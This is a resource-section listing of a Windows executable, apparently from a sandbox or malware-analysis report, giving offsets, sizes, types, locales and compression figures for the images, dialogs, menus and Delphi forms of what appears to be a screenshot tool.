                                  PNG0x1bda0c0x127PNG image data, 60 x 48, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9322033898305084
                                  PNG0x1bdb340x170PNG image data, 80 x 64, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.8097826086956522
                                  PNG0x1bdca40x1a6PNG image data, 100 x 80, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.7535545023696683
                                  PNG0x1bde4c0xc6PNG image data, 9 x 8, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9949494949494949
                                  PNG0x1bdf140xfdPNG image data, 11 x 10, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0
                                  PNG0x1be0140x121PNG image data, 13 x 12, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0069204152249136
                                  PNG0x1be1380xedPNG image data, 18 x 16, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0
                                  PNG0x1be2280x115PNG image data, 22 x 20, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0
                                  PNG0x1be3400xc5PNG image data, 9 x 8, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9898477157360406
                                  PNG0x1be4080xfaPNG image data, 11 x 10, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.004
                                  PNG0x1be5040xddPNG image data, 13 x 12, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9547511312217195
                                  PNG0x1be5e40x14aPNG image data, 18 x 16, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.009090909090909
                                  PNG0x1be7300x128PNG image data, 22 x 20, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.010135135135135
                                  PNG0x1be8580xc0PNG image data, 8 x 9, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.984375
                                  PNG0x1be9180xcbPNG image data, 10 x 11, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9852216748768473
                                  PNG0x1be9e40x116PNG image data, 12 x 13, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0071942446043165
                                  PNG0x1beafc0xebPNG image data, 16 x 18, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9957446808510638
                                  PNG0x1bebe80x11bPNG image data, 20 x 22, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0
                                  PNG0x1bed040xbePNG image data, 8 x 9, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9894736842105263
                                  PNG0x1bedc40xd0PNG image data, 10 x 11, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9711538461538461
                                  PNG0x1bee940xdcPNG image data, 12 x 13, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.990909090909091
                                  PNG0x1bef700xe8PNG image data, 16 x 18, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0
                                  PNG0x1bf0580xffPNG image data, 20 x 22, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0
                                  PNG0x1bf1580xbcPNG image data, 8 x 9, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9893617021276596
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| PNG | 0x1bf214 | 0xcb | PNG image data, 10 x 11, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.9802955665024631 |
| PNG | 0x1bf2e0 | 0x112 | PNG image data, 12 x 13, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.9598540145985401 |
| PNG | 0x1bf3f4 | 0xef | PNG image data, 16 x 18, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.0 |
| PNG | 0x1bf4e4 | 0x119 | PNG image data, 20 x 22, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.0 |
| PNG | 0x1bf600 | 0xbf | PNG image data, 8 x 9, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.9842931937172775 |
| PNG | 0x1bf6c0 | 0xcf | PNG image data, 10 x 11, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.9855072463768116 |
| PNG | 0x1bf790 | 0xde | PNG image data, 12 x 13, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.9954954954954955 |
| PNG | 0x1bf870 | 0xec | PNG image data, 16 x 18, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.9957627118644068 |
| PNG | 0x1bf95c | 0xfa | PNG image data, 20 x 22, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.0 |
| PNG | 0x1bfa58 | 0xbe | PNG image data, 9 x 8, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.9947368421052631 |
| PNG | 0x1bfb18 | 0xc8 | PNG image data, 11 x 10, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.99 |
| PNG | 0x1bfbe0 | 0xbda3 | PNG image data, 13 x 12, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.7202916761076894 |
| PNG | 0x1cb984 | 0xe8 | PNG image data, 18 x 16, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.9956896551724138 |
| PNG | 0x1cba6c | 0x109 | PNG image data, 22 x 20, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.0 |
| PNG | 0x1cbb78 | 0xce | PNG image data, 9 x 8, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.0 |
| PNG | 0x1cbc48 | 0xca | PNG image data, 11 x 10, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.9851485148514851 |
| PNG | 0x1cbd14 | 0xf6 | PNG image data, 13 x 12, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.9959349593495935 |
| PNG | 0x1cbe0c | 0xee | PNG image data, 18 x 16, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.9957983193277311 |
| PNG | 0x1cbefc | 0xbf71 | PNG image data, 22 x 20, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.7202146544512232 |
| PNG | 0x1d7e70 | 0x12d | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.0066445182724253 |
| PNG | 0x1d7fa0 | 0x13a | PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.0095541401273886 |
| PNG | 0x1d80dc | 0x161 | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.0113314447592068 |
| PNG | 0x1d8240 | 0x18a | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.0203045685279188 |
| PNG | 0x1d83cc | 0x1ca | PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.0240174672489082 |
| PNG | 0x1d8598 | 0xff | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.0 |
| PNG | 0x1d8698 | 0x11b | PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.0035335689045937 |
| PNG | 0x1d87b4 | 0x135 | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.0161812297734627 |
| PNG | 0x1d88ec | 0x160 | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.0113636363636365 |
| PNG | 0x1d8a4c | 0x18c | PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.0176767676767677 |
| PNG | 0x1d8bd8 | 0x4f5 | PNG image data, 50 x 50, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.0086682427107958 |
| PNG | 0x1d90d0 | 0x2b8 | PNG image data, 50 x 50, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.0158045977011494 |
| PNG | 0x1d9388 | 0x42b | PNG image data, 50 x 50, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.0103092783505154 |
| PNG | 0x1d97b4 | 0x3d7 | PNG image data, 50 x 50, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.0111902339776195 |
| PNG | 0x1d9b8c | 0xf6 | PNG image data, 40 x 32, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.0040650406504066 |
| PNG | 0x1d9c84 | 0xcd | PNG image data, 40 x 32, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.0 |
| PNG | 0x1d9d54 | 0x10c | PNG image data, 40 x 32, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.0223880597014925 |
| PNG | 0x1d9e60 | 0x240 | PNG image data, 50 x 40, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.0190972222222223 |
| PNG | 0x1da0a0 | 0x27d | PNG image data, 26 x 21, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.0172684458398744 |
| PNG | 0x1da320 | 0x39c | PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.0119047619047619 |
| PNG | 0x1da6bc | 0x717 | PNG image data, 50 x 50, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.8429752066115702 |
| PNG | 0x1dadd4 | 0x7e5 | PNG image data, 60 x 60, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.8629391390400791 |
| PNG | 0x1db5bc | 0x937 | PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.8817295464179737 |
| PNG | 0x1dbef4 | 0xa5e | PNG image data, 100 x 100, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.8862094951017332 |
| PNG | 0x1dc954 | 0x4a5 | PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.0092514718250631 |
| PNG | 0x1dcdfc | 0x7f5 | PNG image data, 50 x 50, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.8689248895434463 |
| PNG | 0x1dd5f4 | 0x8f0 | PNG image data, 60 x 60, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.8837412587412588 |
| PNG | 0x1ddee4 | 0xabf | PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.9051254089422028 |
| PNG | 0x1de9a4 | 0xcb7 | PNG image data, 100 x 100, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.9182795698924732 |
| PNG | 0x1df65c | 0x438 | PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.010185185185185 |
| PNG | 0x1dfa94 | 0x7af | PNG image data, 50 x 50, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.8566344687341129 |
| PNG | 0x1e0244 | 0x87f | PNG image data, 60 x 60, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.8726436781609196 |
| PNG | 0x1e0ac4 | 0xa53 | PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.8974650018917897 |
| PNG | 0x1e1518 | 0xc5f | PNG image data, 100 x 100, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.9153773287022419 |
| PNG | 0x1e2178 | 0x796 | PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.005664263645726 |
| PNG | 0x1e2910 | 0xbee | PNG image data, 50 x 50, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.9119187950229207 |
| PNG | 0x1e3500 | 0xda8 | PNG image data, 60 x 60, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.9236270022883295 |
| PNG | 0x1e42a8 | 0x114b | PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.9405918229049017 |
| PNG | 0x1e53f4 | 0x14d6 | PNG image data, 100 x 100, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.9514435695538058 |
| PNG | 0x1e68cc | 0x7fa | PNG image data, 50 x 50, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.8653281096963761 |
| PNG | 0x1e70c8 | 0x8e2 | PNG image data, 62 x 62, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.8768689533861038 |
| PNG | 0x1e79ac | 0xa08 | PNG image data, 75 x 75, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.8921339563862928 |
| PNG | 0x1e83b4 | 0xc4f | PNG image data, 100 x 100, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.9139955569660425 |
| PNG | 0x1e9004 | 0xf37 | PNG image data, 125 x 125, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.9324775353016688 |
| PNG | 0x1e9f3c | 0x325 | PNG image data, 32 x 16, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.013664596273292 |
| PNG | 0x1ea264 | 0x472 | PNG image data, 42 x 21, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.0096660808435853 |
| PNG | 0x1ea6d8 | 0x55f | PNG image data, 52 x 26, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.008 |
| PNG | 0x1eac38 | 0x6ae | PNG image data, 63 x 31, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.0064327485380118 |
| PNG | 0x1eb2e8 | 0x8f3 | PNG image data, 84 x 42, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.0048013967699694 |
| PNG | 0x1ebbdc | 0x9ba | PNG image data, 37 x 47, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.004417670682731 |
| PNG | 0x1ec598 | 0x34d | PNG image data, 126 x 14, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.01301775147929 |
| PNG | 0x1ec8e8 | 0xa99 | PNG image data, 157 x 17, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.0040545521562845 |
| PNG | 0x1ed384 | 0xc30 | PNG image data, 189 x 21, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.003525641025641 |
| PNG | 0x1edfb4 | 0xe60 | PNG image data, 252 x 28, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.0029891304347827 |
| PNG | 0x1eee14 | 0x1506 | PNG image data, 315 x 35, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.0020438498699369 |
| PNG | 0x1f031c | 0xbbe | PNG image data, 37 x 47, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.0036593479707252 |
| RT_BITMAP | 0x1f0edc | 0x1028 | Device independent bitmap graphic, 32 x 32 x 32, image size 4096 | | | 0.41392649903288203 |
| RT_BITMAP | 0x1f1f04 | 0x428 | Device independent bitmap graphic, 16 x 16 x 32, image size 1024 | | | 0.2161654135338346 |
| RT_BITMAP | 0x1f232c | 0x428 | Device independent bitmap graphic, 16 x 16 x 32, image size 1024 | | | 0.5018796992481203 |
| RT_BITMAP | 0x1f2754 | 0x428 | Device independent bitmap graphic, 16 x 16 x 32, image size 1024 | | | 0.3167293233082707 |
| RT_BITMAP | 0x1f2b7c | 0x1028 | Device independent bitmap graphic, 32 x 32 x 32, image size 4096 | | | 0.5548839458413927 |
| RT_BITMAP | 0x1f3ba4 | 0x428 | Device independent bitmap graphic, 16 x 16 x 32, image size 1024 | | | 0.5582706766917294 |
| RT_BITMAP | 0x1f3fcc | 0x428 | Device independent bitmap graphic, 16 x 16 x 32, image size 1024 | | | 0.48402255639097747 |
| RT_BITMAP | 0x1f43f4 | 0x428 | Device independent bitmap graphic, 16 x 16 x 32, image size 1024 | | | 0.5469924812030075 |
| RT_BITMAP | 0x1f481c | 0x428 | Device independent bitmap graphic, 16 x 16 x 32, image size 1024 | | | 0.4906015037593985 |
| RT_BITMAP | 0x1f4c44 | 0x1028 | Device independent bitmap graphic, 32 x 32 x 32, image size 4096 | | | 0.3034332688588008 |
| RT_BITMAP | 0x1f5c6c | 0x428 | Device independent bitmap graphic, 16 x 16 x 32, image size 1024 | | | 0.48872180451127817 |
| RT_BITMAP | 0x1f6094 | 0x6804 | Device independent bitmap graphic, 391 x 17 x 32, image size 26588, resolution 3582 x 3582 px/m | English | Great Britain | 0.2400105152471083 |
| RT_BITMAP | 0x1fc898 | 0x5c28 | Device independent bitmap graphic, 368 x 16 x 32, image size 23552, resolution 3700 x 3700 px/m | English | Great Britain | 0.2527975584944049 |
| RT_BITMAP | 0x2024c0 | 0x8fe8 | Device independent bitmap graphic, 460 x 20 x 32, image size 36800, resolution 3503 x 3503 px/m | English | Great Britain | 0.2719326818675353 |
| RT_BITMAP | 0x20b4a8 | 0xcf28 | Device independent bitmap graphic, 552 x 24 x 32, image size 52992, resolution 3543 x 3543 px/m | English | Great Britain | 0.23167144365666012 |
| RT_BITMAP | 0x2183d0 | 0x17028 | Device independent bitmap graphic, 736 x 32 x 32, image size 94208, resolution 3543 x 3543 px/m | English | Great Britain | 0.1775528393175452 |
| RT_BITMAP | 0x22f3f8 | 0x23f28 | Device independent bitmap graphic, 920 x 40 x 32, image size 147200, resolution 3503 x 3503 px/m | English | Great Britain | 0.14206058136375985 |
| RT_BITMAP | 0x253320 | 0x9ea4 | Device independent bitmap graphic, 483 x 21 x 32, image size 40572, resolution 3582 x 3582 px/m | English | Great Britain | 0.2606618733379297 |
| RT_BITMAP | 0x25d1c4 | 0xe0c4 | Device independent bitmap graphic, 575 x 25 x 32, image size 57500, resolution 3503 x 3503 px/m | English | Great Britain | 0.21746611053180395 |
| RT_BITMAP | 0x26b288 | 0x19f98 | Device independent bitmap graphic, 782 x 34 x 32, image size 106352, resolution 3543 x 3543 px/m | English | Great Britain | 0.16091435446274155 |
| RT_BITMAP | 0x285220 | 0x27a18 | Device independent bitmap graphic, 966 x 42 x 32, image size 162288, resolution 3582 x 3582 px/m | English | Great Britain | 0.13048272633187127 |
| RT_BITMAP | 0x2acc38 | 0x2028 | Device independent bitmap graphic, 128 x 16 x 32, image size 8192, resolution 3700 x 3700 px/m | English | Great Britain | 0.04652575315840622 |
| RT_BITMAP | 0x2aec60 | 0x3228 | Device independent bitmap graphic, 160 x 20 x 32, image size 12800, resolution 3700 x 3700 px/m | English | Great Britain | 0.07842679127725857 |
| RT_BITMAP | 0x2b1e88 | 0x4828 | Device independent bitmap graphic, 192 x 24 x 32, image size 18432, resolution 3661 x 3661 px/m | English | Great Britain | 0.056463837158943264 |
| RT_BITMAP | 0x2b66b0 | 0x8028 | Device independent bitmap graphic, 256 x 32 x 32, image size 32768, resolution 3661 x 3661 px/m | English | Great Britain | 0.0326749573274811 |
| RT_BITMAP | 0x2be6d8 | 0xc828 | Device independent bitmap graphic, 320 x 40 x 32, image size 51200, resolution 3661 x 3661 px/m | English | Great Britain | 0.03266978922716628 |
| RT_BITMAP | 0x2caf00 | 0xab8 | Device independent bitmap graphic, 52 x 13 x 32, image size 2704, resolution 2795 x 2795 px/m | English | Great Britain | 0.1271865889212828 |
| RT_BITMAP | 0x2cb9b8 | 0x1028 | Device independent bitmap graphic, 64 x 16 x 32, image size 4096, resolution 3622 x 3622 px/m | English | Great Britain | 0.1071083172147002 |
| RT_BITMAP | 0x2cc9e0 | 0x16b8 | Device independent bitmap graphic, 76 x 19 x 32, image size 5776, resolution 3622 x 3622 px/m | English | Great Britain | 0.10333562585969738 |
| RT_BITMAP | 0x2ce098 | 0x2a68 | Device independent bitmap graphic, 104 x 26 x 32, image size 10816, resolution 3661 x 3661 px/m | English | Great Britain | 0.05407148120854827 |
| RT_BITMAP | 0x2d0b00 | 0x4028 | Device independent bitmap graphic, 128 x 32 x 32, image size 16384, resolution 3661 x 3661 px/m | English | Great Britain | 0.0479176814417925 |
| RT_BITMAP | 0x2d4b28 | 0x2028 | Device independent bitmap graphic, 16 x 128 x 32, image size 8192, resolution 2834 x 2834 px/m | English | Great Britain | 0.22983479105928087 |
| RT_BITMAP | 0x2d6b50 | 0x1028 | Device independent bitmap graphic, 32 x 32 x 32, image size 4096, resolution 3780 x 3780 px/m | English | Canada | 0.30947775628626695 |
| RT_ICON | 0x2d7b78 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | Chinese | China | 0.32692535194605465 |
| RT_MENU | 0x2e83a0 | 0x5e | data | English | Great Britain | 0.8617021276595744 |
| RT_MENU | 0x2e8400 | 0x13c | data | English | Great Britain | 0.49683544303797467 |
| RT_MENU | 0x2e853c | 0x8e | data | English | Great Britain | 0.6971830985915493 |
| RT_MENU | 0x2e85cc | 0x1aa | data | English | Great Britain | 0.42018779342723006 |
| RT_MENU | 0x2e8778 | 0xda | data | English | Great Britain | 0.6238532110091743 |
| RT_MENU | 0x2e8854 | 0x164 | data | English | Great Britain | 0.547752808988764 |
| RT_MENU | 0x2e89b8 | 0xbe | data | English | Great Britain | 0.6368421052631579 |
| RT_MENU | 0x2e8a78 | 0xae | data | English | Great Britain | 0.632183908045977 |
| RT_MENU | 0x2e8b28 | 0xb8 | data | English | Great Britain | 0.657608695652174 |
| RT_DIALOG | 0x2e8be0 | 0x530 | data | English | Great Britain | 0.42846385542168675 |
| RT_DIALOG | 0x2e9110 | 0x238 | data | English | Great Britain | 0.4982394366197183 |
| RT_DIALOG | 0x2e9348 | 0xe8 | data | English | Great Britain | 0.6508620689655172 |
| RT_DIALOG | 0x2e9430 | 0x1c8 | data | English | Great Britain | 0.5657894736842105 |
| RT_DIALOG | 0x2e95f8 | 0x1e0 | data | English | Great Britain | 0.49166666666666664 |
| RT_DIALOG | 0x2e97d8 | 0x1ac | data | English | Great Britain | 0.5607476635514018 |
| RT_DIALOG | 0x2e9984 | 0x1cc | data | English | Great Britain | 0.5 |
| RT_DIALOG | 0x2e9b50 | 0x1e4 | data | English | Great Britain | 0.5206611570247934 |
| RT_DIALOG | 0x2e9d34 | 0x33c | data | English | Great Britain | 0.358695652173913 |
| RT_DIALOG | 0x2ea070 | 0x6b6 | data | English | Great Britain | 0.3911525029103609 |
| RT_DIALOG | 0x2ea728 | 0x1a4 | data | English | Great Britain | 0.5166666666666667 |
| RT_DIALOG | 0x2ea8cc | 0x1ce | data | English | Great Britain | 0.48268398268398266 |
| RT_DIALOG | 0x2eaa9c | 0x4e4 | data | English | Great Britain | 0.40814696485623003 |
| RT_DIALOG | 0x2eaf80 | 0x57e | data | English | Great Britain | 0.4139402560455192 |
| RT_DIALOG | 0x2eb500 | 0x54 | data | English | Great Britain | 0.8095238095238095 |
| RT_DIALOG | 0x2eb554 | 0xe0 | data | English | Great Britain | 0.6517857142857143 |
| RT_DIALOG | 0x2eb634 | 0x29a | data | English | Great Britain | 0.47297297297297297 |
| RT_DIALOG | 0x2eb8d0 | 0xdc | data | English | Great Britain | 0.6363636363636364 |
| RT_DIALOG | 0x2eb9ac | 0x70 | data | English | Great Britain | 0.7857142857142857 |
| RT_DIALOG | 0x2eba1c | 0x1ce | data | English | Great Britain | 0.48484848484848486 |
| RT_DIALOG | 0x2ebbec | 0x180 | data | English | Great Britain | 0.5755208333333334 |
| RT_DIALOG | 0x2ebd6c | 0x230 | data | English | Great Britain | 0.4446428571428571 |
| RT_DIALOG | 0x2ebf9c | 0xc4 | data | English | Great Britain | 0.7244897959183674 |
| RT_DIALOG | 0x2ec060 | 0x14c | data | English | Great Britain | 0.5993975903614458 |
| RT_DIALOG | 0x2ec1ac | 0x462 | data | English | Great Britain | 0.43137254901960786 |
| RT_DIALOG | 0x2ec610 | 0x468 | data | English | Great Britain | 0.43351063829787234 |
| RT_DIALOG | 0x2eca78 | 0x224 | data | English | Great Britain | 0.5091240875912408 |
| RT_DIALOG | 0x2ecc9c | 0x286 | data | English | Great Britain | 0.5046439628482973 |
| RT_DIALOG | 0x2ecf24 | 0x1e8 | data | English | Great Britain | 0.5758196721311475 |
| RT_DIALOG | 0x2ed10c | 0xc8 | dBase III DBT, next free block index 4294901761 | English | Great Britain | 0.665 |
| RT_DIALOG | 0x2ed1d4 | 0x938 | data | English | Great Britain | 0.3771186440677966 |
| RT_DIALOG | 0x2edb0c | 0x462 | data | English | Great Britain | 0.446524064171123 |
| RT_DIALOG | 0x2edf70 | 0x48a | data | English | Great Britain | 0.3717728055077453 |
| RT_DIALOG | 0x2ee3fc | 0x34 | data | English | Great Britain | 0.9038461538461539 |
| RT_DIALOG | 0x2ee430 | 0x336 | data | English | Great Britain | 0.38929440389294406 |
| RT_DIALOG | 0x2ee768 | 0x462 | data | English | Great Britain | 0.44563279857397503 |
| RT_DIALOG | 0x2eebcc | 0xd6 | dBase III DBT, next free block index 4294901761 | English | Great Britain | 0.7009345794392523 |
| RT_DIALOG | 0x2eeca4 | 0x37c | data | English | Great Britain | 0.4461883408071749 |
| RT_DIALOG | 0x2ef020 | 0xd4 | data | English | Great Britain | 0.6037735849056604 |
| RT_DIALOG | 0x2ef0f4 | 0x2c8 | data | English | Great Britain | 0.44662921348314605 |
| RT_DIALOG | 0x2ef3bc | 0x1a2 | data | English | Great Britain | 0.5239234449760766 |
| RT_DIALOG | 0x2ef560 | 0x186 | data | English | Great Britain | 0.5948717948717949 |
| RT_DIALOG | 0x2ef6e8 | 0x3b4 | data | English | Great Britain | 0.4588607594936709 |
| RT_DIALOG | 0x2efa9c | 0x38a | data | English | Great Britain | 0.45916114790286977 |
| RT_DIALOG | 0x2efe28 | 0x3c8 | data | English | Great Britain | 0.3894628099173554 |
| RT_DIALOG | 0x2f01f0 | 0x428 | data | English | Great Britain | 0.36654135338345867 |
| RT_DIALOG | 0x2f0618 | 0x92 | data | English | Great Britain | 0.6027397260273972 |
| RT_DIALOG | 0x2f06ac | 0x39c | data | English | Great Britain | 0.4090909090909091 |
| RT_DIALOG | 0x2f0a48 | 0x248 | data | English | Great Britain | 0.488013698630137 |
| RT_DIALOG | 0x2f0c90 | 0x51c | data | English | Great Britain | 0.4258409785932722 |
| RT_DIALOG | 0x2f11ac | 0x558 | data | English | Great Britain | 0.4159356725146199 |
| RT_DIALOG | 0x2f1704 | 0x4fe | data | English | Great Britain | 0.4460093896713615 |
| RT_DIALOG | 0x2f1c04 | 0x544 | data | English | Great Britain | 0.41839762611275966 |
| RT_DIALOG | 0x2f2148 | 0x454 | data | English | Great Britain | 0.4575812274368231 |
| RT_DIALOG | 0x2f259c | 0x144 | data | English | Great Britain | 0.6172839506172839 |
| RT_DIALOG | 0x2f26e0 | 0x514 | data | English | Great Britain | 0.4276923076923077 |
| RT_DIALOG | 0x2f2bf4 | 0x248 | data | English | Great Britain | 0.4674657534246575 |
| RT_DIALOG | 0x2f2e3c | 0x1dc | data | English | Great Britain | 0.5189075630252101 |
| RT_DIALOG | 0x2f3018 | 0xfc | data | English | Great Britain | 0.6746031746031746 |
| RT_DIALOG | 0x2f3114 | 0x40 | data | English | Great Britain | 0.875 |
| RT_DIALOG | 0x2f3154 | 0x334 | data | English | Great Britain | 0.44390243902439025 |
| RT_STRING | 0x2f3488 | 0x2b4 | data | | | 0.47398843930635837 |
| RT_STRING | 0x2f373c | 0xbe0 | data | | | 0.24243421052631578 |
| RT_RCDATA | 0x2f431c | 0x10 | data | | | 1.5 |
| RT_RCDATA | 0x2f432c | 0x3ac | data | | | 0.7042553191489361 |
| RT_RCDATA | 0x2f46d8 | 0x140 | Delphi compiled form 'TFormMain' | | | 0.740625 |
| RT_RCDATA | 0x2f4818 | 0xb90 | Delphi compiled form 'TMadExcept' | | | 0.47297297297297297 |
| RT_RCDATA | 0x2f53a8 | 0x34e | Delphi compiled form 'TMEContactForm' | | | 0.43498817966903075 |
| RT_RCDATA | 0x2f56f8 | 0x228 | Delphi compiled form 'TMEDetailsForm' | | | 0.5416666666666666 |
| RT_RCDATA | 0x2f5920 | 0x2a3 | Delphi compiled form 'TMEScrShotForm' | | | 0.5333333333333333 |
| RT_RCDATA | 0x2f5bc4 | 0x507 | Delphi compiled form 'TNoticForm' | | | 0.5003885003885004 |
| RT_RCDATA | 0x2f60cc | 0x2c634 | Delphi compiled form 'TScreenShotMainForm' | | | 0.26612654830264226 |
| RT_RCDATA | 0x322700 | 0x20a2 | Delphi compiled form 'TTipForm' | | | 0.3003351687814221 |
| RT_GROUP_ICON | 0x3247a4 | 0x14 | data | Chinese | China | 1.15 |
| RT_VERSION | 0x3247b8 | 0x30c | data | English | United States | 0.4564102564102564 |
| RT_DLGINCLUDE | 0x324ac4 | 0x7b836 | PC bitmap, Windows 3.x format, 63720 x 2 x 43, image size 506370, cbSize 505910, bits offset 54 | | | 0.42614891976833824 |
| RT_ANIICON | 0x3a02fc | 0xc657 | PC bitmap, Windows 3.x format, 6558 x 2 x 36, image size 51339, cbSize 50775, bits offset 54 | | | 0.4406499261447563 |
| RT_ANIICON | 0x3ac954 | 0x8ef0 | PC bitmap, Windows 3.x format, 5482 x 2 x 42, image size 37043, cbSize 36592, bits offset 54 | | | 0.39869370354175776 |
| RT_ANIICON | 0x3b5844 | 0xbf26 | PC bitmap, Windows 3.x format, 6505 x 2 x 54, image size 49665, cbSize 48934, bits offset 54 | | | 0.34722278988024685 |
| RT_ANIICON | 0x3c176c | 0x33400 | PC bitmap, Windows 3.x format, 26476 x 2 x 52, image size 210721, cbSize 209920, bits offset 54 | | | 0.4880573551829268 |
| RT_ANIICON | 0x3f4b6c | 0x2dede | PC bitmap, Windows 3.x format, 23700 x 2 x 52, image size 188837, cbSize 188126, bits offset 54 | | | 0.4889754738845242 |
| RT_MANIFEST | 0x422a4c | 0x352 | XML 1.0 document, ASCII text, with CRLF line terminators | Chinese | China | 0.48 |
| DLL | Import |
|---|---|
